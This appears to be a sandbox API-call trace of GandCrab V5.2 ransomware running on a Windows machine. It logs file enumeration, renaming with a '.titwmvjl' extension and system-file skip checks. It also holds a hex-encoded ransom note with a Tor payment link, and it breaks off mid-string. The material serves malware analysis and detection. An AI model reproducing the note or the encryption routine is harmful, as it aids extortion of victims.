[0073.482] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x319)) [0073.482] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.482] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.482] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.482] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a09d2ca4deb61a.lock") returned 99 [0073.482] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0073.483] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.484] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.484] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 75 [0073.484] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0073.484] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5036f8 [0073.484] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.484] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.484] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.484] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.484] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.484] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.484] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.484] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a09d2ca4deb61a.lock" [0073.484] lstrlenW (lpString=".titwmvjl") returned 9 [0073.484] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a09d2ca4deb61a.lock") returned 99 [0073.484] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.485] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 108 [0073.485] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a09d2ca4deb61a.lock") returned 99 [0073.485] lstrlenW (lpString=".lock") returned 5 [0073.485] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.485] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.485] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.485] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.486] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.486] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.486] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.486] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\TITWMVJL-DECRYPT.txt" [0073.486] lstrlenW (lpString=".titwmvjl") returned 9 [0073.486] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\TITWMVJL-DECRYPT.txt") returned 95 [0073.486] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.486] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 104 [0073.486] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\TITWMVJL-DECRYPT.txt") returned 95 [0073.486] lstrlenW (lpString=".txt") returned 4 [0073.486] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.486] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.486] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.486] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.487] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\TITWMVJL-DECRYPT.txt") returned 95 [0073.487] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\TITWMVJL-DECRYPT.txt") returned 95 [0073.487] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.487] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.487] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.487] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.487] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.487] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.487] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.487] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.487] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.487] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0073.487] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0073.487] CloseHandle (hObject=0x2cc) returned 1 [0073.488] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.488] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0073.488] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0073.488] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CTLs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0073.488] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0073.488] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.488] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.488] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.489] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.489] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.489] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.489] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.489] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.489] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.489] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.489] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.491] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\TITWMVJL-DECRYPT.txt") returned 96 [0073.491] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0073.491] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\